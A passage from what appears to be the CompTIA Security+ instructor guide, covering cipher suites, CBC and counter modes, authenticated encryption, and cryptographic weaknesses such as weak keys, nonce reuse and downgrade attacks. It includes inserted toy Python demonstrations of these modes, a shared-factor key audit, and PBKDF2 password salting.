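    transcript = client_pub.to_bytes(P_BYTES, "big") + server_pub.to_bytes(P_BYTES, "big")
    client_key = derive_session_key(dh_shared_secret(client_priv, server_pub), transcript)
    server_key = derive_session_key(dh_shared_secret(server_priv, client_pub), transcript)
    # The private exponents go out of scope here; nothing retained can rebuild this key later.
    return client_key, server_key, (client_pub, server_pub)


if __name__ == "__main__":
    key1_client, key1_server, wire1 = run_session()
    key2_client, key2_server, wire2 = run_session()
    print("session 1, both sides agree:", key1_client == key1_server)
    print("session 2, both sides agree:", key2_client == key2_server)
    print("sessions use different keys:", key1_client != key2_client)
    print("public values on the wire differ per session:", wire1 != wire2)
```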

Show Slide(s): Cipher Suites and Modes of Operation

Cipher Suites and Modes of Operation

In a protocol such as Transport Layer Security (TLS), the requirements to both authenticate the identity of the server and to encrypt communications between the server and client need to be fulfilled by separate cryptographic products and cipher implementations. The combination of ciphers supported is referred to as a cipher suite. The server and client negotiate mutually compatible cipher suites as part of the TLS handshake.

Teaching Tip: While the syllabus no longer mentions cipher block chaining (CBC; except as under CCMP and in the acronym list), it is included here to help to explain the problems that arise from padding and the necessity of using counter mode/stream ciphers. The acronym list also continues to list rarely implemented modes, such as ECB and CFB. Hopefully, students should not need to know these, but you may want to point them out. Note that in TLS 1.3, the signature and key agreement algorithms are no longer part of the actual suite. The signature algorithm is provided via the server's digital certificate and key agreement is always Diffie-Hellman.

So far, we have identified two parts of the cipher suite:

• A signature algorithm, used to assert the identity of the server's public key and facilitate authentication.

• A key exchange/agreement algorithm, used by the client and server to derive the same bulk encryption symmetric key.

The final part of a cipher suite determines the bulk encryption cipher. When AES is selected as the symmetric cipher, it has to be used in a mode of operation that supports a stream of network data.

Cipher Block Chaining (CBC) Mode

The Cipher Block Chaining (CBC) mode applies an initialization vector (IV) to the first plaintext block to ensure that the key produces a unique ciphertext from any given plaintext. The output of the first ciphertext block is then combined with the next plaintext block using an XOR operation. This process is repeated through the full chain of blocks, which again ensures that no plaintext block produces the same ciphertext. CBC needs to use padding to ensure that the data to encrypt is an exact multiple of the block size.

XOR is a logical operation that outputs 1 only when the inputs are 1 and 0.

Counter Mode

Counter mode makes the AES algorithm work as a stream cipher. Counter mode applies an IV plus an incrementing counter value to the key to generate a keystream. The keystream is then XOR'ed to the data in the plaintext blocks. Each block can be processed individually and consequently in parallel, improving performance. Also, counter modes do not need to use padding. Any unused space in the last block is simply discarded.
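To make the two modes concrete, the following added example (not from the guide) implements CBC with PKCS#7-style padding and counter mode over a toy 128-bit Feistel block cipher built from SHA-256. The toy cipher stands in for AES so that the chaining, padding and keystream logic is the real thing; the function names and the sample message are this example's own.

```python
import hashlib
import secrets

BLOCK = 16  # 128-bit blocks, the AES block size


def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def _round_function(key, half, round_no):
    return hashlib.sha256(key + bytes([round_no]) + half).digest()[:8]


def block_encrypt(key, block):
    """Toy 128-bit block cipher: a 4-round Feistel network keyed with SHA-256.
    It is invertible and key-dependent, which is all the modes below need; it is NOT a safe cipher."""
    left, right = block[:8], block[8:]
    for i in range(4):
        left, right = right, xor(left, _round_function(key, right, i))
    return left + right


def block_decrypt(key, block):
    left, right = block[:8], block[8:]
    for i in reversed(range(4)):
        left, right = xor(right, _round_function(key, left, i)), left
    return left + right


def pad(data):
    """PKCS#7-style padding: always append 1..16 bytes, each holding the pad length."""
    n = BLOCK - len(data) % BLOCK
    return data + bytes([n]) * n


def unpad(data):
    n = data[-1] if data else 0
    if not 1 <= n <= BLOCK or data[-n:] != bytes([n]) * n:
        raise ValueError("bad padding")  # the accept/reject behaviour a padding oracle attack observes
    return data[:-n]


def cbc_encrypt(key, iv, plaintext):
    """CBC: XOR each plaintext block with the previous ciphertext block (the IV for the first), then encrypt."""
    previous, out = iv, bytearray()
    padded = pad(plaintext)
    for i in range(0, len(padded), BLOCK):
        previous = block_encrypt(key, xor(padded[i:i + BLOCK], previous))
        out += previous
    return bytes(out)


def cbc_decrypt(key, iv, ciphertext):
    previous, out = iv, bytearray()
    for i in range(0, len(ciphertext), BLOCK):
        block = ciphertext[i:i + BLOCK]
        out += xor(block_decrypt(key, block), previous)
        previous = block
    return unpad(bytes(out))


def ctr_crypt(key, nonce, data):
    """Counter mode: encrypt (nonce || counter) to get a keystream block and XOR it with the data.
    The same call decrypts. Blocks are independent (parallelisable) and a short last block needs no padding."""
    out = bytearray()
    for counter, i in enumerate(range(0, len(data), BLOCK)):
        keystream = block_encrypt(key, nonce + counter.to_bytes(8, "big"))  # 8-byte nonce + 8-byte counter
        out += xor(data[i:i + BLOCK], keystream)  # zip() stops at the shorter input: the tail is simply discarded
    return bytes(out)


if __name__ == "__main__":
    key = secrets.token_bytes(32)
    iv = secrets.token_bytes(BLOCK)
    # Constructed sample: two identical 16-byte blocks followed by a partial block.
    msg = b"ATTACK AT DAWN!!" * 2 + b"extra"
    cbc = cbc_encrypt(key, iv, msg)
    print("CBC:", len(msg), "plaintext bytes ->", len(cbc), "ciphertext bytes (padded)")
    print("identical plaintext blocks give different CBC blocks:", cbc[:16] != cbc[16:32])
    print("CBC round trip ok:", cbc_decrypt(key, iv, cbc) == msg)
    ctr = ctr_crypt(key, iv[:8], msg)
    print("CTR:", len(msg), "plaintext bytes ->", len(ctr), "ciphertext bytes (no padding)")
    print("CTR round trip ok:", ctr_crypt(key, iv[:8], ctr) == msg)
```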


Show Slide(s): Authenticated Modes of Operation

Authenticated Modes of Operation

Symmetric algorithms do not provide message integrity or authentication. The basic CBC and counter modes of operation are unauthenticated. While a man-in-the-middle cannot decrypt them directly without the secret key, the ciphertexts are vulnerable to arbitrary data being inserted or modified to break the encryption scheme, referred to as a chosen ciphertext attack.

Teaching Tip: Students should not need to recognize the cipher suite names for the exam, but in practical terms they would be highly recommended to learn them anyway, not least because TLS 1.3 is reduced to just three algorithms. Consequently, we are including the relevant acronyms for recognition purposes, but not trying to explain the difference between, say, HMAC and CBC-MAC.

Authenticated Encryption

A message authentication code (MAC) provides an authentication and integrity mechanism by hashing a combination of the message output and a shared secret key. The recipient can perform the same process using his or her copy of the secret key to verify the data. This type of authenticated encryption scheme is specified in a cipher suite as separate functions, such as AES-CBC with HMAC-SHA. Unfortunately, the implementation of this type of authenticated mode in AES CBC is vulnerable to a type of cryptographic attack called a padding oracle attack (docs.microsoft.com/en-us/dotnet/standard/security/vulnerabilities-cbc-mode).

Authenticated Encryption with Additional Data (AEAD)

The weaknesses of CBC arising from the padding mechanism means that stream ciphers or counter modes are strongly preferred. These use Authenticated Encryption with Additional Data (AEAD) modes of operation. In an AEAD scheme, the associated data allows the receiver to use the message header to ensure the payload has not been replayed from a different communication stream.

An AEAD mode is identified by a single hyphenated function name, such as AES-GCM or AES-CCM. The ChaCha20-Poly1305 stream cipher has been developed as an alternative to AES.
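An added example (not from the guide) of the AEAD idea using only the standard library: a counter-mode keystream for confidentiality and an HMAC tag over the header, nonce and ciphertext for integrity (encrypt-then-MAC, not the polynomial MAC that AES-GCM uses). It shows the associated data at work: a payload copied under a different stream header, or with one bit flipped, is rejected before any decryption takes place. The names, keys and sample header are this example's own.

```python
import hashlib
import hmac
import secrets

TAG_LEN = 32  # bytes; SHA-256 output


def _subkeys(key):
    # Separate keys for encryption and authentication, both derived from one shared secret.
    return hashlib.sha256(b"enc" + key).digest(), hashlib.sha256(b"mac" + key).digest()


def _keystream_xor(enc_key, nonce, data):
    """Counter-mode keystream built from SHA-256, standing in for AES-CTR (not in the stdlib)."""
    out = bytearray()
    for i in range(0, len(data), 32):
        block = hashlib.sha256(enc_key + nonce + (i // 32).to_bytes(8, "big")).digest()
        out += bytes(a ^ b for a, b in zip(data[i:i + 32], block))
    return bytes(out)


def _tag(mac_key, aad, nonce, ciphertext):
    # Length-prefix the AAD so the boundary between header and ciphertext cannot be shifted.
    material = len(aad).to_bytes(8, "big") + aad + nonce + ciphertext
    return hmac.new(mac_key, material, hashlib.sha256).digest()


def seal(key, nonce, aad, plaintext):
    """Return ciphertext || tag. The AAD (here a record header) is authenticated but sent in the clear."""
    enc_key, mac_key = _subkeys(key)
    ciphertext = _keystream_xor(enc_key, nonce, plaintext)
    return ciphertext + _tag(mac_key, aad, nonce, ciphertext)


def unseal(key, nonce, aad, sealed):
    """Verify the tag over header, nonce and ciphertext BEFORE decrypting; None means reject."""
    if len(sealed) < TAG_LEN:
        return None
    ciphertext, tag = sealed[:-TAG_LEN], sealed[-TAG_LEN:]
    enc_key, mac_key = _subkeys(key)
    if not hmac.compare_digest(tag, _tag(mac_key, aad, nonce, ciphertext)):
        return None  # modified payload, modified header, or a record replayed into another stream
    return _keystream_xor(enc_key, nonce, ciphertext)


if __name__ == "__main__":
    key = secrets.token_bytes(32)
    nonce = secrets.token_bytes(12)
    header = b"stream=42;seq=7"  # constructed record header used as the associated data
    record = seal(key, nonce, header, b"transfer 100 credits")
    print("genuine record:", unseal(key, nonce, header, record))
    # The same record presented under another stream's header: the tag no longer matches.
    print("replayed under another header:", unseal(key, nonce, b"stream=99;seq=7", record))
    # One ciphertext bit flipped: plain CTR would silently decrypt to altered plaintext.
    flipped = bytes([record[0] ^ 0x01]) + record[1:]
    print("bit-flipped payload:", unseal(key, nonce, header, flipped))
```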


Review Activity:
Cryptographic Modes of Operation
Answer the following questions:

1. What is the process of digitally signing a message?

A hashing function is used to create a message digest. The digest is then signed using the sender's private key. The resulting signature can be decrypted by the recipient using the sender's public key and cannot be modified by any other agency. The recipient can calculate his or her own digest of the message and compare it to the signed hash to validate that the message has not been altered.

2. In a digital envelope, which key encrypts the session key?

The recipient's public key (typically from the server's key pair).

3. True or False? Perfect forward secrecy (PFS) ensures that a compromise of a server's private key will not also put copies of traffic sent to that server in the past at risk of decryption.

True. PFS ensures that ephemeral keys are used to encrypt each session. These keys are destroyed after use.

4. Why does Diffie-Hellman underpin perfect forward secrecy?

Diffie-Hellman allows the sender and recipient to derive the same value (the session key) from some other pre-agreed values. Some of these are exchanged, and some kept private, but there is no way for a snooper to work out the secret just from the publicly exchanged values. This means session keys can be created without relying on the server's private key, and that it is easy to generate ephemeral keys that are different for each session.

5. What type of bulk encryption cipher mode of operation offers the best security?

Generally, counter modes implementing Authenticated Encryption with Additional Data (AEAD). Specific examples include AES-GCM and ChaCha20-Poly1305.


Topic 5C
Summarize Cryptographic Use Cases and Weaknesses

EXAM OBJECTIVES COVERED
1.2 Given a scenario, analyze potential indicators to determine the type of attack
2.8 Summarize the basics of cryptographic concepts

Teaching Tip: Having established the types of cryptographic function and the use of hybrid encryption, this topic covers use cases, limitations, and weaknesses. We also look at the cryptographic attacks content examples from objective 1.2.

There are many individual symmetric and asymmetric cipher algorithms and hash functions. Characteristics of these ciphers make them better suited to meeting constraints, such as use on battery-powered devices. Some of the ciphers and implementations of ciphers within products can exhibit weaknesses that make them unsuitable for use. It is important that you be able to summarize these use cases and weaknesses so that you can deploy controls that are fit for purpose.

Show Slide(s): Cryptography Supporting Authentication and Non-Repudiation

Cryptography Supporting Authentication and Non-Repudiation

A single hash function, symmetric cipher, or asymmetric cipher is called a cryptographic primitive. A complete cryptographic system or product is likely to use multiple cryptographic primitives, such as within a cipher suite. The properties of different symmetric/asymmetric/hash types and of specific ciphers for each type impose limitations on their use in different contexts and for different purposes.

Teaching Tip: This section and the next aim to reinforce the content presented in the previous topic. If students have formed a good understanding of the way digital signatures and hybrid encryption support these use cases, you can skip this section and the one on confidentiality and consider resiliency and performance issues.

If you are able to encrypt a message in a particular way, it follows that the recipient of the message knows with whom he or she is communicating (that is, the sender is authenticated). This means that encryption can form the basis of identification, authentication, and access control systems.

Encryption allows subjects to identify and authenticate themselves. The subject could be a person, or a computer such as a web server.


Non-repudiation is linked to identification and authentication. It is the concept that the sender cannot deny sending the message. If the message has been encrypted in a way known only to the sender, it follows that the sender must have composed it.

Authentication and non-repudiation depend on the recipient not being able to encrypt the message, or the recipient would be able to impersonate the sender. This means that to support authentication and non-repudiation, recipients must be able to use the cryptographic process to decrypt authentication and integrity data, but not to encrypt it. This use case is supported by asymmetric encryption ciphers and public/private key pairs.

To use a key pair, the user or server generates the linked keys. The private key is stored securely and protected from use by others by the account password. It is critical that only the user or server be able to use the private key. The public key is given to clients or correspondents, usually in the form of a digital certificate.

When the user or server needs to authenticate, it encrypts some agreed hashed data using the private key and sends it to the client as a digital signature. The client should be able to decrypt the signature using the public key and derive the same hash value.

Show Slide(s): Cryptography Supporting Confidentiality

Cryptography Supporting Confidentiality

Cryptography removes the need to store or transfer messages over secure media. It does not matter if a ciphertext is stolen or intercepted because the threat actor will not be able to understand or change what has been stolen. This use of cryptography fulfils the goal of confidentiality. For this use case, you cannot simply use asymmetric encryption and private/public key pairs, because the algorithm cannot encrypt large amounts of data efficiently. For example, the RSA asymmetric cipher has a maximum message size of the key size in bytes minus 11. A key size of 2048 bits allows a maximum message size of 245 bytes (256 - 11). The computational overhead of using this type of algorithm to encrypt the contents of a disk or stream of network traffic is far too high.

Therefore, bulk data encryption uses a symmetric cipher, such as AES. A symmetric cipher can encrypt and decrypt data files and streams of network traffic quickly. The problem is that distributing a symmetric key securely is challenging. The more people who know the key value, the weaker the confidentiality property is. The risks of a threat actor obtaining the key grow exponentially. Luckily, symmetric keys are only 128 bits or 256 bits long, and so can easily be encrypted using a public key. Consequently, most cryptographic systems use both symmetric and asymmetric encryption.

Encryption supporting confidentiality is used for both data-at-rest (file encryption) and data-in-transit (transport encryption):

• File encryption—the user is allocated an asymmetric cipher key pair. The private key is written to secure storage—often a trusted platform module (TPM)—and is only available when the user has authenticated to his or her account. The public key is used to encrypt a randomly generated AES cipher key. When the user tries to encrypt or decrypt files, the AES cipher key is decrypted using the private key to make it available for the encryption or decryption operation.

• Transport encryption—this uses either digital envelopes or perfect forward secrecy. For HTTPS, a web server is allocated a key pair and stores the private key securely. The public key is distributed to clients via a digital certificate. The client and server use the key pair to exchange or agree on one or more AES cipher keys to use as session keys.


Show Slide(s): Cryptography Supporting Integrity and Resiliency

Cryptography Supporting Integrity and Resiliency

Integrity is proved by hashing algorithms, which allow two parties to derive the same checksum and show that a message or data has not been tampered with. A basic hash function can also be used with a shared secret to create a message authentication code (MAC), which prevents a man-in-the-middle tampering with the checksum.

Teaching Tip: NCSC's Dr Ian Levy's article on designing the security system for smart meters in the UK (ncsc.gov.uk/information/smart-security-behind-the-gb-smart-metering-system) is a good example of some of the considerations that go into the design of a highly resilient system.

As well as providing integrity at the level of individual messages, cryptography can be used to design highly resilient control systems. A control system is one with multiple parts, such as sensors, workstations, and servers, and complex operating logic. Such a system is resilient if compromise of a small part of the system is prevented from allowing compromise of the whole system. Cryptography assists this goal by ensuring the authentication and integrity of messages delivered over the control system.

Integrity and resiliency are also an issue for computer code. If a threat actor has administrator privileges, they can change the operation of legitimate code to make it work as malware. A developer can make tampering more difficult using obfuscation. Obfuscation is the art of making a message difficult to understand. Obfuscated source code is rewritten in a way that does not affect the way the computer compiles or executes the code, but makes it difficult for a person reading the code to understand how it works.

Cryptography is a very effective way of obfuscating a message, but unfortunately, it is too effective in the case of source code because it also means the code cannot be understood/executed by the computer. At some point, the code must be decrypted to be executed. The key used for decryption usually needs to be bundled with the source code, and this means that you are relying on security by obscurity rather than strong cryptography. Attempts to protect an embedded key while preserving the functionality of the code—known as white-box cryptography—have all been broken. There are no commercial solutions currently available to overcome this problem, but the subject is one of much research interest.

Show Slide(s): Cryptographic Performance Limitations

Cryptographic Performance Limitations

Differences between ciphers make them more or less useful for resource-constrained environments. The main performance factors are as follows:

Teaching Tip: The syllabus places a lot of emphasis on limitations and use cases, so make sure students understand these factors.

• Speed—for symmetric ciphers and hash functions, speed is the amount of data per second that can be processed. Asymmetric ciphers are measured by operations per second. Speed has the most impact when large amounts of data are processed.

• Time/latency—for some use cases, the time required to obtain a result is more important than a data rate. For example, when a secure protocol depends on ciphers in the handshake phase, no data transport can take place until the handshake is complete. This latency, measured in milliseconds, can be critical to performance.

• Size—the security of a cipher is strongly related to the size of the key, with longer keys providing better security. Note that the key size cannot be used to make comparisons between algorithms. For example, a 256-bit ECC key is stronger than a 2048-bit RSA key. Larger keys will increase the computational overhead for each operation, reducing speed and increasing latency.

• Computational overheads—in addition to key size selection, different ciphers have unique performance characteristics. Some ciphers require more CPU and memory resources than others, and are less suited to use in a resource-constrained environment.

Lesson 5: Summarizing Basic Cryptographic Concepts | Topic 5C

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
114 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

In selecting a product or individual cipher for a particular use case, a tradeoff must be achieved between the demand for the best security available and the resources available for implementation.
• Low-power devices: some technologies or ciphers configured with longer keys require more processing cycles and memory space. This makes them slower and means they consume more power. Consequently, some algorithms and key strengths are unsuitable for handheld devices and embedded systems, especially those that work on battery power. Another example is a contactless smart card, where the card only receives power from the reader and has fairly limited storage capacity, which affects the maximum key size supported.
• Low-latency uses: this can impact protocol handshake setup times. A longer handshake will manifest as delay for the user, and could cause timeout issues with some applications. Also, if cryptography is deployed with a real-time-sensitive channel, such as voice or video, the processing overhead on both the transmitter and receiver must be low enough not to impact the quality of the signal.

Cryptographic Security Limitations

Show Slide(s): Cryptographic Security Limitations

Teaching Tip: You can illustrate a weak key problem by referencing the Debian OpenSSL vulnerability. Two lines of code in Debian's OpenSSL package were removed when highlighted by a debugging application. These two lines were responsible for ensuring that the keyspace was large and random. Consequently, for two years, Debian OpenSSL servers using this patch were generating keys from a very limited range of values. Another example is the NSA-inserted backdoor in a random number generator proposed for use with ECC (see the ISACA Journal article "Can Elliptic Curve Cryptography Be Trusted? A Brief Analysis of the Security of a Popular Cryptosystem" at isaca.org).

Resource constraints may require you to make a tradeoff between security and performance, but you cannot trade too far.

Entropy and Weak Keys
Entropy is a measure of disorder. A plaintext will usually exhibit low entropy as it represents a message in a human language or programming language or data structure. The plaintext must be ordered for it to be intelligible to a person, computer processor, or database. One of the requirements of a strong cryptographic algorithm is to produce a disordered ciphertext. Put another way, the ciphertext must exhibit a high level of entropy. If any elements of order from the plaintext persist, it will make the ciphertext vulnerable to cryptanalysis, and the algorithm can be shown to be weak.
It is important to realize that just because an algorithm, such as AES, is considered strong does not mean that the implementation of that cipher in a programming library is also strong. The implementation may have weaknesses. It is vital to monitor the status of this type of programming code and apply updates promptly. If a weakness is revealed, any keys issued under the weak version must be replaced and data re-encrypted.
A weak key is one that produces ciphertext that is lower entropy than it should be. If a key space contains weak keys, the technology using the cipher should prevent use of these keys. DES and RC4 are examples of algorithms known to have weak keys. The way a cipher is implemented in software may also lead to weak keys being used. An example of this is a bug in the pseudo-random number generator for the OpenSSL server software for Debian Linux (wiki.debian.org/SSLkeys). A weak number generator leads to many published keys sharing a common factor. A cryptanalyst can test for the presence of these factors and derive the whole key much more easily. Consequently, the true random number generator (TRNG) or pseudo RNG (PRNG) module in the cryptographic implementation is critical to its strength.


Pseudo RNG working during key generation using GPG. This method gains entropy from user mouse and keyboard usage.

You can read more about true versus pseudo random number generation at random.org.
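The shared-factor problem described above, as an added example that is not part of the CompTIA guide: a constructed generator with a tiny state space issues toy RSA-style moduli, and a pairwise GCD audit over the public moduli finds the keys whose factors can be recovered. The prime pool, the WeakPrng class and the audit functions are all constructed for this illustration.

```python
"""Pairwise-GCD audit of RSA-style moduli issued by a low-entropy PRNG.

Added example, not from the CompTIA guide. WEAK_PRIME_POOL and WeakPrng are
constructed stand-ins for a generator with very few internal states; the
tiny primes keep the arithmetic readable and are not realistic key sizes.
"""
from itertools import combinations
from math import gcd
import random

# Constructed: the only primes a generator with eight seed states could reach.
WEAK_PRIME_POOL = [10007, 10009, 10037, 10039, 10061, 10067, 10069, 10079]


class WeakPrng:
    """Simulates a PRNG whose seed space is tiny (for example, only a process ID)."""

    def __init__(self, seed=0):
        self._rng = random.Random(seed)

    def prime(self):
        # However many keys are generated, every prime comes from the same pool.
        return WEAK_PRIME_POOL[self._rng.randrange(len(WEAK_PRIME_POOL))]


def weak_keygen(prng, count):
    """Issue `count` toy moduli n = p * q (p != q) from the weak generator."""
    moduli = []
    for _ in range(count):
        p = prng.prime()
        q = prng.prime()
        while q == p:
            q = prng.prime()
        moduli.append(p * q)
    return moduli


def find_shared_factors(moduli):
    """Return {(i, j): g} for every pair of moduli whose GCD is not 1.

    gcd == 1 is the healthy case. Any other value is a shared prime (both keys
    are now factorable) or, when g equals both moduli, a duplicated key.
    """
    findings = {}
    for (i, n_i), (j, n_j) in combinations(enumerate(moduli), 2):
        g = gcd(n_i, n_j)
        if g != 1:
            findings[(i, j)] = g
    return findings


def factor_from_shared(n, g):
    """Split modulus n using a leaked factor g; returns (p, q) in ascending order."""
    if g in (1, n) or n % g != 0:
        raise ValueError("g is not a proper factor of n")
    return tuple(sorted((g, n // g)))


def audit(moduli):
    """Indexes of every key in the inventory whose private factors are exposed."""
    exposed = set()
    for pair in find_shared_factors(moduli):
        exposed.update(pair)
    return exposed


if __name__ == "__main__":
    inventory = weak_keygen(WeakPrng(), 10)
    # Ten keys need up to 20 distinct primes; the pool has 8, so sharing is certain.
    for (i, j), g in sorted(find_shared_factors(inventory).items()):
        detail = factor_from_shared(inventory[i], g) if g != inventory[i] else "duplicate key"
        print(f"keys {i} and {j} share factor {g}: {detail}")
    print("keys needing replacement:", sorted(audit(inventory)))
```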

Predictability and Reuse

Predictability is a weakness in either the cipher operation or within particular key values that make a ciphertext lower entropy and vulnerable to cryptanalysis. Reuse of the same key within the same session can cause this type of weakness. The RC4 stream cipher and some chained block modes of operation are not as secure as other cipher modes, because they exhibit predictability. Often, it is necessary to use an additional random or pseudo-random value in conjunction with the cipher:
• Nonce: the principal characteristic of a nonce is that it is never reused ("number used once") within the same scope (that is, with the same key value). It could be a random or pseudo-random value, or it could be a counter value.
• Initialization vector (IV): the principal characteristic of an IV is that it be random (or pseudo-random). There may also be a requirement that an IV not be reused (as with a nonce), but this is not the primary characteristic.
• Salt: this is also a random or pseudo-random number or string. The term salt is used specifically in conjunction with hashing password values.
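Why the "never reused under the same key" rule for a nonce matters, as an added example that is not code from the guide: a toy stream cipher whose keystream is SHA-256 over key, nonce and counter stands in for a real counter-mode cipher, and NonceGuard is a constructed wrapper that refuses a repeated nonce. The key, nonces and plaintexts are constructed values.

```python
"""Nonce reuse in a stream/counter-mode construction (added example, not from the guide).

The keystream is derived here as SHA-256(key || nonce || counter) purely so the
effect is visible without a crypto library; the same rule applies to AES-CTR,
AES-GCM and ChaCha20. KEY, the nonces and P1/P2 below are constructed values.
"""
import hashlib


def keystream(key, nonce, length):
    """Deterministic keystream: identical (key, nonce) always yields identical bytes."""
    out = bytearray()
    counter = 0
    while len(out) < length:
        out += hashlib.sha256(key + nonce + counter.to_bytes(4, "big")).digest()
        counter += 1
    return bytes(out[:length])


def xor_bytes(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def encrypt(key, nonce, plaintext):
    """Stream encryption: ciphertext = plaintext XOR keystream(key, nonce).
    Decryption is the same operation applied to the ciphertext."""
    return xor_bytes(plaintext, keystream(key, nonce, len(plaintext)))


def leaked_plaintext_xor(c1, c2):
    """If c1 and c2 were made with the same key and nonce, the keystreams cancel
    and c1 XOR c2 == p1 XOR p2: the predictability the text warns about."""
    return xor_bytes(c1, c2)


class NonceGuard:
    """Enforces 'number used once' per key: a repeated nonce is an error, not a send."""

    def __init__(self):
        self._seen = {}  # key -> set of nonces already used under it

    def encrypt(self, key, nonce, plaintext):
        used = self._seen.setdefault(key, set())
        if nonce in used:
            raise ValueError("nonce already used under this key; refusing to encrypt")
        used.add(nonce)
        return encrypt(key, nonce, plaintext)


# Constructed demo values (same length so the XOR relation is visible end to end).
KEY = b"constructed-key!"
P1 = b"transfer 100 to account A"
P2 = b"transfer 900 to account B"

if __name__ == "__main__":
    c1 = encrypt(KEY, b"nonce-01", P1)
    c2 = encrypt(KEY, b"nonce-01", P2)  # same nonce under the same key: the mistake
    print("same nonce leaks p1 XOR p2:", leaked_plaintext_xor(c1, c2) == xor_bytes(P1, P2))
    c3 = encrypt(KEY, b"nonce-02", P2)  # distinct nonce: ciphertexts are unrelated
    print("distinct nonce leaks nothing:", leaked_plaintext_xor(c1, c3) != xor_bytes(P1, P2))
```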


Longevity and Cryptographic Attacks

Show Slide(s): Longevity and Cryptographic Attacks

Teaching Tip: You might refer to Schneier's Law (see the "Schneier's Law" post at schneier.com/blog).

Use of weak cipher suites and implementations can represent a critical vulnerability for an organization. It means that data that it is storing and processing may not be secure. It may also allow a malicious attacker to masquerade as it by creating spoofed digital certificates, causing huge reputational damage.
Weaknesses in certain ciphers make some unsafe to use and some that are considered likely to be unsafe in the near-term or medium-term future. In one sense, longevity is a measure of the confidence that people have in a given cipher. Cryptanalysis is undertaken on encryption systems with the purpose of trying to detect weaknesses. However, if weaknesses discovered in a particular cipher or the implementation of a cipher under research conditions lead to the deprecation of that algorithm, that does not necessarily mean that the system is immediately vulnerable in practice.
RC4 and DES/3DES are already deprecated. RSA is seen as approaching the end of its usefulness, with ECC and other algorithms offering better security and performance characteristics (thesslstore.com/blog/is-it-still-safe-to-use-rsa-encryption). MD5 and SHA-1 have known weaknesses, but are not necessarily insecure if compatibility is an overriding concern.
In another sense, longevity is the consideration of how long data must be kept secure. If you assume that a ciphertext will be exposed at some point, how long must that ciphertext resist cryptanalysis? For example, imagine an NSA operative's laptop is stolen. The thief cannot hope to break the encryption with current computing resources, but how long must that encryption mechanism continue to protect the data? If advances in cryptanalysis will put it at risk within a matter of years or decades, could a more secure algorithm have been chosen? There is always a tradeoff among security, cost, and interoperability. Malicious mathematical attacks are difficult to launch, and the chances of success against up-to-date, proven technologies and standards are remote. If a deprecated algorithm is in use, there is no need for panic, but there will be a need for a plan to closely monitor the affected systems and to transition to better technologies as quickly as is practical.

Man-in-the-Middle and Downgrade Attacks

Show Slide(s): Man-in-the-Middle and Downgrade Attacks

Some attacks depend on capturing the communications between two parties. They do not break the cryptographic system but exploit vulnerabilities in the way it is used. A man-in-the-middle (MITM) attack is typically focused on public key cryptography.
1. Mallory eavesdrops the channel between Alice and Bob and waits for Alice to request Bob's public key.
2. Mallory intercepts the communication, retaining Bob's public key, and sends his own public key to Alice.
3. Alice uses Mallory's key to encrypt a message and sends it to Bob.
4. Mallory intercepts the message and decrypts it using his private key.
5. Mallory then encrypts a message (possibly changing it) with Bob's public key and sends it to Bob, leaving Alice and Bob oblivious to the fact that their communications have been compromised.
This attack is prevented by using secure authentication of public keys, such as associating the keys with certificates. This should ensure that Alice rejects Mallory's public key.
A downgrade attack can be used to facilitate a man-in-the-middle attack by requesting that the server use a lower specification protocol with weaker ciphers and key lengths. For example, rather than use the latest TLS version, as the server might prefer, the client
requests the use of SSL. It then becomes easier for Mallory to forge the signature of a
certificate authority that Alice trusts and have Alice trust his public key.

Key Stretching and Salting

Show Slide(s): Key Stretching and Salting

Entropy is a concern whenever a cryptographic system makes use of user-generated data, such as a password. Users tend to select low-entropy passwords, because they are easier to remember. A couple of technologies try to compensate for this.

Key Stretching
Key stretching takes a key that's generated from a user password and repeatedly converts it to a longer and more random key. The initial key may be put through thousands of rounds of hashing. This might not be difficult for the attacker to replicate so it doesn't actually make the key stronger, but it slows the attack down, as the attacker has to do all this extra processing for each possible key value. Key stretching can be performed by using a particular software library to hash and save passwords when they are created. The Password-Based Key Derivation Function 2 (PBKDF2) is very widely used for this purpose, notably as part of Wi-Fi Protected Access (WPA).

Salting
Passwords stored as hashes are vulnerable to brute force and dictionary attacks. A password hash cannot be decrypted; hash functions are one-way. However, an attacker can generate hashes to try to find a match for a password hash captured from network traffic or a password file. A brute force attack simply runs through every possible combination of letters, numbers, and symbols. A dictionary attack creates hashes of common words and phrases.
Both these attacks can be slowed down by adding a salt value when creating the hash, so you compute:
(salt + password) * SHA = hash
The salt is not kept secret, because any system verifying the hash must know the value of the salt. It simply means that an attacker cannot use pre-computed tables of hashes. The hash values must be recompiled with the specific salt value for each password.
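Salting and key stretching together, as an added example that is not the guide's code: each password gets a random salt and is stretched with PBKDF2-HMAC-SHA256, and a precomputed table built from a constructed list of common words shows what the salt defeats. The storage string format and the iteration count are choices made for this illustration.

```python
"""Salted, stretched password storage with PBKDF2 (added example, not from the guide).

The storage string format and ITERATIONS are choices made for this example.
COMMON_WORDS is a constructed list used to build a small precomputed table.
"""
import hashlib
import hmac
import os
from typing import Optional

ITERATIONS = 100_000  # chosen here; raise it until one verification costs tens of ms
SALT_BYTES = 16

COMMON_WORDS = ["password", "letmein", "qwerty", "dragon", "welcome1"]  # constructed


def hash_password(password: str, salt: Optional[bytes] = None,
                  iterations: int = ITERATIONS) -> str:
    """Return 'pbkdf2_sha256$<iterations>$<salt hex>$<derived key hex>'.

    The salt is stored in the clear: the verifier needs it, and secrecy is not
    what it provides. Its job is to make every user's hash unique.
    """
    salt = os.urandom(SALT_BYTES) if salt is None else salt
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${dk.hex()}"


def verify_password(password: str, stored: str) -> bool:
    """Recompute with the stored salt and iteration count; compare in constant time."""
    algo, iters, salt_hex, dk_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        raise ValueError("unsupported hash format")
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"),
                             bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(dk, bytes.fromhex(dk_hex))


def unsalted_sha256(password: str) -> str:
    """The weak baseline the text contrasts with: no salt, one fast hash."""
    return hashlib.sha256(password.encode("utf-8")).hexdigest()


def precomputed_table(words) -> dict:
    """What an attacker builds once and reuses against every unsalted hash: hash -> word."""
    return {unsalted_sha256(w): w for w in words}


def table_lookup(stored_hash: str, table: dict) -> Optional[str]:
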